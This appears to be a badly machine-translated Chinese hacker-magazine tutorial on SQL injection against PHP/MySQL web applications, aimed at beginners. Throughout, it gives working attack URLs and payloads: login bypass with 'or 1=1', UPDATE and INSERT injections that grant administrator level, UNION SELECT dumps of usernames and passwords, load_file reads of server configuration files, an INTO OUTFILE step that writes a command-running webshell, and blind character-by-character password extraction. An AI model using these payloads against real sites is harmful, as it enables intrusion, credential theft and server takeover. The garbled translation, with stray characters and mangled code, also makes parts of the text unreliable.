PHP Injection Attack is the most popular way of attack today, with its powerful flexibility to attract the vast number. In the previous issue, "PHP Safety and Injection Topics" Zhonglin .Linx mainly tells the various vulnerabilities of the PHP program, but also the problem of PHP mysql injection, but the problem of injection is relatively small, let us feel that there is no happiness. OK, I will blow the PHP mysql injection for everyone, so you must return you (Who throws brick!). This article is mainly serving the small dishes. If you are already a old bird, some things will feel more boring, but as long as you look at it, you will find a lot of interesting things. Read this article, you only have to understand this thing below. 1. I understand how the PHP MySQL environment is built, and the related articles we have included in the CD, if you are not very clear about building a PHP MySQL environment, please check this article first, introduced in the previous topic. . 2. Probably understand the configuration of PHP and Apache, mainly use php.ini and httpd.conf, and this article we mainly use is the configuration of php.ini. In order to be safe, we generally open the security mode in php.ini, that is, let Safe_Mode = ON, and one is to return to PHP execution errors, which will return a lot of useful information, so we should close, let Display_ERRORS = OFF After the error is turned off, the PHP function executes the error message will not be displayed again. In PHP configuration file php.ini has a very important configuration option MAGIC_QUOTES_GPC, the high version of the default is magic_quotes_gpc = ON, only the default configuration in the original antique PHP is Magic_QUOTES_GPC = Off, but the antique thing Some people have used it! When Magic_QUOTES_GPC = ON occurs during php.ini, there is no panic, the sky is can't collapse! It is just to automatically turn all the '(single quotes), "(dual quotes), / (double quotes), / (double quotes), and empty characters in the submitted variable, such as turning' into / ', Turn it into //. That's this, let us very bad, many times we have to say Byebye, but we will have a good way to deal with it. Watch! 3. There is a certain PHP language basis and understand some SQL statements, these are very simple, we use things very little, so charging still! Let's take a look at Magic_QUOTES_GPC = OFF, we can do it Something, then we want to engage in Magic_QUOTES_GPC = ON case: magic_quotes_gpc = OFF injection attack MAGIC_QUOTES_GPC = OFF The situation is very unsafe, the new version will make magic_quotes_gpc = ON, but there are many In the server, we also found MAGIC_QUOTES_GPC = OFF, such as www.qichi. *. There are some programs like the VBB Forum Even if you configure Magic_QUOTES_GPC = ON, it will automatically eliminate the escape character to make us organically multiply, so say maic_quotes_gpc = OFF injection method is also a big market.
Below we will explain in a few aspects of grammar, injecting point and injection types, Mysql PHP injection A: From mysql syntax first 1. Let's talk about the basic syntax of MySQL, it is for children who don't have a good study. Oh ~ _ ~ 1) SELECT SELECT [stright_join] [SQL_SMALL_RESULT] select_expression, ... [INTO {Outfile | Dumpfile} 'file_name' export_Options] [from Table_reference [Where where_definition] [group by col_name, ...] [Order by {unsigned_integer | col_name | formula} [ASC | DESC], ...]] is commonly used, select_expression refers to the column you want to retrieve, then we You can use WHERE to limit the conditions, and we can also use Into Outfile to output the select result into the file. Of course, we can also directly output, such as mysql> select 'a'; - | A | - - | A | - 1 ROW IN Set (0.00 sec) specific content, please see mysql Chinese Manual 7.12 Says Some Use Ok, see the code first code is used to search ......... SELECT * from users where username like '% $ Search%' Order by username .... ...?> Here we use the wildcards in MySQL, '%' is a wildcard, and other wildcards have '*' and '_', where "*" is used to match the word name, and "%" is used Match the field value, note that% must be applied with Like, there is a wildcard, which is the underscore "_", which is the meaning and above, is used to match any single character. In the above code, we use '*' to indicate all field names returned, and% $ search% indicate all content that contains $ Search characters. How do we inject? Haha, and ASP is similar to the AABB% 'or 1 = 1 ORDER BY ID # Note: # # 注 m m 中 中 中 不 l l l l l l l l l l l l 不Perhaps someone will ask why I use or 1 = 1, look at it, bring the submitted content into the SQL statement into the SQL statement becomes select * from users where username Like '% AABB%' or 1 = 1 Order by ID # Order by UserName If there is no user name containing AABB, or 1 = 1 makes the return value true, enabling all values. We can also submit% 'Order By ID # or' Order By ID # in the form in the form of the SQL statement Cheng Select * from users where username like '%%' Order by id # Order by username and select * from username where username Like '%%' Order by id # Order by username is of course, the content returns.
List all users, no password is coming out. Here is an example, there will be a more exquisite SELECT statement, and select is almost everywhere! 2) Look below this explanation in the Update m q 中文 manual: update [low_priority] tbl_name set color_name1 = expr1, col_name2 = expr2, ... [where where_definition] Update updates the list of row in the existing table, set clause points out Which column wants to modify and they should be given the value, where clause, if given, specify which line should be updated, otherwise all rows are updated. Details go to the mysql Chinese manual 7.17, the words that will be detailed here will be very proud. It is known that Update is primarily used for data updates, such as the modification of the article. We seem to be more concerned about the latter, because ... look at the code first, let's give the structure, so everyone Uns (ID INT (10) Not Null Auto_INCREMENT, Login Varchar (25), Password Varchar (25), Email Varchar (30), Userlevel Tinyint, Primary Key (ID)) where the USERLEVEL representation, 1 is managed Servers, 2 for ordinary users
//change.php ... $ sql = "Update users set password = '$ pass', email = '$ email' where id = '$ ID'" ...?> OK, we I started to inject, adding the email place We add Netsh @ 163.com ', userlevel =' 1 SQL statement is UPDATEERS set password = 'YOUPASS', Email = 'netsh @ 163.com', userlevel = '1' where id = 'YOUID' Look at our userlevel is 1, become an administrator. Haha, so cool, it is a must-have for home travel. Here we simply mention the problem of single quotation, if only one single quotes are used without single quotes, the system will return an error. Column Types are divided into digital types, date and time types, string types, however quotes are generally used in string types, and in digital types, ordinary people will not use quotation marks (however it can be used, and power is very powerful Large), date and time types are rarely used for injection (because few submitted time variables). In the following we will detail these types of injection methods! 3) The next round to INSERT, it has been waiting for impatient, just like the students in the noon cafeteria. PHP Chinese manual teaches us: Insert [low_priority | delayed] [ignore] [INTO] TBL_NAME [(Col_name, ...)] Values (Expression, ...), (...), ... insert Insert a new line into an existing table, insert ... Values form statement based on the explicit specified value inserted, insert ... Select Form Insert from other tables, there are multiple values of INSERT.. The form of VALUES is supported in MySQL 3.22.5 or later, col_name = expression syntax is supported in MySQL 3.22.10 or later. It can be seen that in order to see the background, INSERT mainly appears in a registered place, or there are other places where you submit it. Take a look at the structure of the table Create Table Membres (id varchar (15) Not null default ', login varchar (25), Password varchar (25), Email Varchar (30), Userlevel Tinyint, Primary Key (ID)) We are still Suppose UserLevel represents the user level, 1 for the manager, 2 is ordinary users. code show as below
//reg.php ... $ query = "INSERT INTO MEMBERS VALUES ('$ ID', '$ login', '$ Pass', '$ Email', '2')"; .... ..> Default Insert User Level 2 Now we build the injection statement, or if you want us to enter the email, enter: netsh@163.com ',' 1 ') # SQL statement to perform: Insert Into MEMBRES Values ('Youid', 'Youname', 'Youpass ",' Netsh@163.com ',' 1 ') #' ,? ') Seeing that our registration is an administrator. # 号 What said, not forgot, dizzy, so fast? Forget it, let you talk about it in detail. 2. Let's talk about the comments in MySQL. This is very important. You can't sleep anymore. If you sleep, you will hang you when you go to the end of the exam. We continue to believe that everyone has seen the powerful role of comments in several examples, here we will introduce it in detail. MySQL has three annotation sentences # 注 掉 注 注 内容 本 同 同 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法 方法. - Remember that there is a space behind you to get an annotation. /*...*/ We generally use the front / * is enough, because we can't do it behind, right? Note: When the browser address bar is input #, you should write it into% 23, so that after the Urlencode conversion can be converted #, it is a role in the comment. # 号 Your words in the browser address box are not ok. In order to understand this, I will give you an example of the following administrator information table Create Table Alphaauthor (ID tinyint (4) Not null auto_increment, username varchar (50) not null default ', Password', Password Varchar (50) Default Null, Name Varchar (50) Default Null, Primary Key (ID), UNIQUE Key ID (ID), Key ID_2 (ID))
//Login.php ... $ query = "select * from alphaauthor where username = '$ usrname' and password = '$ passwd'"; $ query); $ data = mysql_fetch_Array ($ Result); if ($ data) {echo "important information";} else echo "landing failed"; ...?> We directly enter http: //**/login.php directly in the browser address box UserName = a'or id = 1% 23% 23 Convert into # 了 了 到 l a =or a u = 'a'or id = 1 #' and password = '$ passwd' ## I have entered it, see this sentence is equivalent to select * from alphaauthor where username = 'a'or id = 1 looks carefully to look at the structure, as long as there is ID = 1 account, the returned $ data should be true We will go directly, of course, you can also write hppt: //***/login.php? Username = a'or 1 = 1% 23 is the same 3. The following will appear ... It is the spy version of these display system information () Returns the database version information Database () Returns the current database name, if there is no current database, Database () returns an empty string. User () system_user () session_user () Returns the current mysql username mysql> select user (), database (), version (); ---------------- - --------- ---------------- | User () | Database () | Version () | --------- ------- ------------ ---------------- | root @ localhost | alpha | 5.0.0-alpha -NT | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ 1 ROW IN Set (0.01 sec) as shown in Figure (1), the picture is not very cool? Watch your big eyes, sometimes it is useful, for example, you can see if his MySQL is overwhelmed by his mysql, it is not allowed to find a good power, haha 4. The following The important part, I didn't sleep, I wake up awake. 1) SELECT UNION SELECT is also in the PHP Chinese manual: SELECT ... Union [all] select ... [Union Select ...] Union is implemented in MySQL 4.0.0. UNION is used to combine the results of multiple SELECT statements to a result set. The columns listed in the Select_expression section of the Select must have the same type. The column name used in the first SELECT query will return to the column names of the result set.
The select command is a normal selection command, but there is a limit: only the last select command can have Into Outfile. It should be noted that the number of SELECT fields before and after UNION is the same, and only the UNION function can play a role. If the number of fields will return Error 1222 (21000): The UseT Statements Have A Different Number of Columns error, this is not good. Is it half? Don't happe, urgently use, for example: ALPHADB table has 11 columns we mysql> Select * from alphadb where id = 351 Union SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 From alphaauthor; as shown (2) We only Slect 10 numbers of course, wrong. See mysql> select * from alphadb where id = 347 Union SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 ,11 from alphaauthor; Figure (3) Let's see ID = 247 Data first mysql> select * from alphadb where id = 347; ---- ----------------------------- --------------- ----------------- | ID | TITLE | Content | ImportTime | Author | Accessing | Addinto | TYPE | Showup | Change_UBB | Change_HTML | ----- ------------------------------------- ------- ----------------- | 347 | Take advantage of adsutil.vbs ..- published in the Man Association 2004.6 | Posted in Hacker x Archive 6th Period | 2004-03-28 11:50:50 | Alpha | 17 | Alpha | 2 | 1 | 1 | 1 | ----- ------------------------------------------------------------------------------------------------------------------------------------------------ -------------------------- ---------------- 1 ROW in Set (0.00 sec) We see, its return result and mysql> select * from alphadb where id = 347 Union SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 ,11 from alphaauthor; identical. Oh, everyone may ask, what is the use? Asked good. OK, continue the test When we enter a non-existent id, for example, id = 0, or id = 347 and 1 <> 1 to see mysql> select * from alphadb where id = 347 and 1 <> 1 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11 from alphaauthor; Figure (4) We found that it will take us 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11 assigned to each field to display. Haha, finally showed a different, but what is this? Don't tell you first.
Let's tell a specific example first http://localhost/site/display.php? Id = 347 Take a look at the 5 http://localhost/site/display.php? Id = 347 and 1 <> 1 Union Select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11 from alphaauthor results As Figure 6 Let's use a picture to summarize Union's usage as shown in Figure 7 ok, know how to use it? If you don't know, you will tell you in detail. 2) Load_file This function is too powerful, this is also the method mentioned in the last topic. Although I said, I have to mention it. Load_file can return the contents of the file, remember to write the full file path and file name ETC. We entered mysql> select load_file in MySQL command line; effect is as shown (8), but we are How do you do it in the web? We can use http://localhost/site/display.php? Id = 347% 20ance% 201 <> 1% 20Union% 20Select% 201, 2, LOAD_FILE ('C: / Apache / HTDOCS / Site / LIB) /sql.inc'), 4, 5, 6, 7, 8, 9, 10, 11 here C: /Apache/htdocs/site/lib/sql.inc is not my profile,: p Look carefully The view in Figure 9 is undoubtedly. Why do we put load_file ('c: /apache/htdocs/site/lib/sql.inc') 3 fields? We mention that there are three types of column types, and the place where 3 in Figure 7 is displayed should be displayed in the article, and should be character type, and load_file ('c: / apache / htdocs / site / lib / sql. INC ') is also a character type, so we speculate that it can be displayed smoothly in 3 fields. In fact, there are still a lot of good use methods, continue to look down! 3) SELECT * from Table Into Outfile'File.txt 'Is there a 啥? The role is to write the content of the table to the file, know more important, we write a WebShell, haha. Of course, we are not just exporting tables, we can also export other things, look down. Hypothesis with the following table # # CREATE TABLE TEST (A Text, B Text) Engine = Myisam Default Charset = latin1; # # 导 导 导 数据 下 内容 `内容` 内容 ` , Null; known my website path in c: / apache / htdocs / site / good, see your performance, type http://localhost/site/display.php? Id = 451% 20and% 201 = 2% 20% 20Union% 20Select% 201, 2, A, 4, 5, 6, 7, 8, 9, 10, 11% 20FROM% 20Test% 20InTo% 20outFile% 20'c: /apore/htdocs/site/cmd.php 'What is meant is to export the contents of the A column in the table to cmd.phphuang to see the content in cmd.php 1 2
0000-00-00 00:00:00 5 6 7 8 9 10 11 Let's take a look at http://localhost/site/cmd.php? Cmd = DIR As shown in Figure (10) Haha, really cool! 4) Let's tell you about the story of Load Data Infile LOAD DATA [Low_Priority] [local] infile 'file_name.txt' [Replace | ignore] INTO TABLE TBL_NAME LOAD DATA INFILE statement reads a very high speed in a text file Table. Because this statement is generally entered directly in the browser, it is not very big. Here, an example, the structure of Test's structure and the same # # # # ## data table described above `Test` # Create Table Test (a text, b text) Engine = myisam default charSet = latin1; we are in the mysql command Enter: mysql> load data infile 'c: /cmd.php' inTo Table test where c: / cmd.php content is
Note: The above content is written in a row. Through the above instructions We entered the contents of the cmd.asp into the test table. The result is shown in Figure (11) actually getting the content in the last example TEST table! Take a look, combined with Into Outfile, is it a perfect combination? The basic syntax will come here, there may be a lot of important things miss, you can go to the PHP Chinese manual, I believe you will find a lot of good things, tap it. (With Disc, we pay a php Chinese manual) B: There are mainly digital, characters, and search classes from the injection method. 1. Digital type is very common. We have always been an example of characters, everyone should still Remember how to break the administrator's password under the ASP, let's take a look at how we implement us under the address bar: http://localhost/site/display.php? Id = 451% 20and% 201 = (SELECT% 20min) ID)% 20FROM% 20alphaauthor) Judging whether there is alphaauthor, if there is a normal page (general situation, sometimes it returns what else, mainly according to the page judgment when constructing 1 = 1 and 1 = 2) http: / /localhost/site/display.php?id=451 and 1= (SELECT MIN (ID ) FROM alphaauthor where Length (Username )=5) Judging whether the UserName field is 5 http: // LocalHost / Site / Display.php? ID = 451% 20and% 201 = (Select% 20min (ID)% 20WHERE% 20LENGTH (username) = 5% 20ance% 20Length (password) = 32) Almost the same Judging the length of the Password field to the guess code, use the ASCII method to give a guess. Ascii is equivalent to ASC, haha, often watching hacker X files must be clear. http://localhost/site/display.php? id = 451% 20and% 201 = (Select% 20min (ID)% 20FM% 20alphaauthor% 20where% 20ASCII (MID (username, 1, 1)) = 97) User name The first place, ascii97 is a character a http://localhost/site/display.php? Id = 451% 20and% 201 = (select% 20min (ID)% 20WHERE% 20ASCII (MID (UserName, 2) 1))) = 108) The second place, here only this picture, as shown in Figure (12) omitting the X bar below. Anyway, we finally got the username and password.
We will find that the injection method here is almost the same as the injection under the ASP. It is to turn the ASC into Ascii, turn the Len to Length, and finally we can get the manager account and password from the background, of course we have more Simple method, you can directly get http: //localhost/site/display.php? Id = 451% 20And% 20Select% 201, Username, Password, 4,5, 6, 7, 8, 9, 10, 11% 20FROM% 20alphaauthor, as shown (13) Account is Alpha, password is a long string of stuff, haha, simple and clear, see no, here showing the power of Union SELECT Powerful. The above is to guess the content in the unconfigured table. If we can also like this in the same table: The following code displays the user information according to the user ID //user.php ......... $ SQL = "Select * from user where id = $ ID"; .......... if (! $ result) {echo "wrong"; exit;} else echo "User Information" ;?> The speculation method is almost the same, that is, we don't have to use SELECT. We entered http: //localhost/user.php? Id = 1 and length (password) = 7 Display User information Description We guess the correct, huh, comeon http://localhost/user.php? Id = 1 And ASCII MID (Password, 1, 1)) = 97 first password http://localhost/user.php? id = 1 and ASCII (MID (Password, 2, 1)) = 97 second place, through this Methods Eventually we can also get ID = 1 users' account password 2. Let's take a look at the method of injection of the character model is flexible in the ASP in the method of injection, and the injection of character model in PHP is mainly mameric_quotes_gpc = Under the case of OFF. (Unless there is another case, don't tell you first), for example:
//display.php ... $ query = "select * from alphadb where id = '". $ ID. "'"; ..............?> like this It turns into characters. I don't know if you have found it. If we write the program like this, the security will improve, huh, huh, continue, we will test whether there is an injection first http://localhost/site/display.php? Id = 451 'and 1 = 1 and '' = 'http://localhost/site/display.php? Id = 451' and 1 = 2 and '' = 'Brought into the SQL statement is SELECT * from alphadb where id =' 451'and 1 = 1 and '' = '' Select * from alphadb where id = '451'and 1 = 2 and' '=' 'If you find pages information different words Description Vulnerability exists or http: // localhost / site / display .php? id = 451 'and 1 = 1% 23 http://localhost/site/display.php? id = 451' and 1 = 2% 23% 23 Transformation is the #, that is, the meaning of the comment, above Oh, if you don't have to consider the closure of the quotation marks, you don't have this method. Bring it into the SQL statement, becomes select * from alphadb where id = '451'and 1 = 1 #' is what we want! Look at the effect, http://localhost/site/display.php? Id = 451 'and 1 = 1% 23 Figure (14) Normal display! http://localhost/site/display.php? id = 451 'and 1 = 2% 23 Figure (15) Show abnormal, haha, explaining the problem existed: http://localhost/site/display.php ? ID = 451 '% 20and% 201 = 2% 20% 20Union% 20Select% 201, Username, Password, 4, 5, 6, 7, 8, 9, 10 ,11% 20From% 20alphaauthor 23 Look at Figure (16) OK, username and password come out again! 3. Let's take a look at the search for the search to search. Search type, you are generally written //search.php ... $ query = "SELECT * from alphadb where title Like '% $ title%'; ... ...........?> Do you still remember the injection in the ASP? But don't remember that there is no relationship, let's see it.
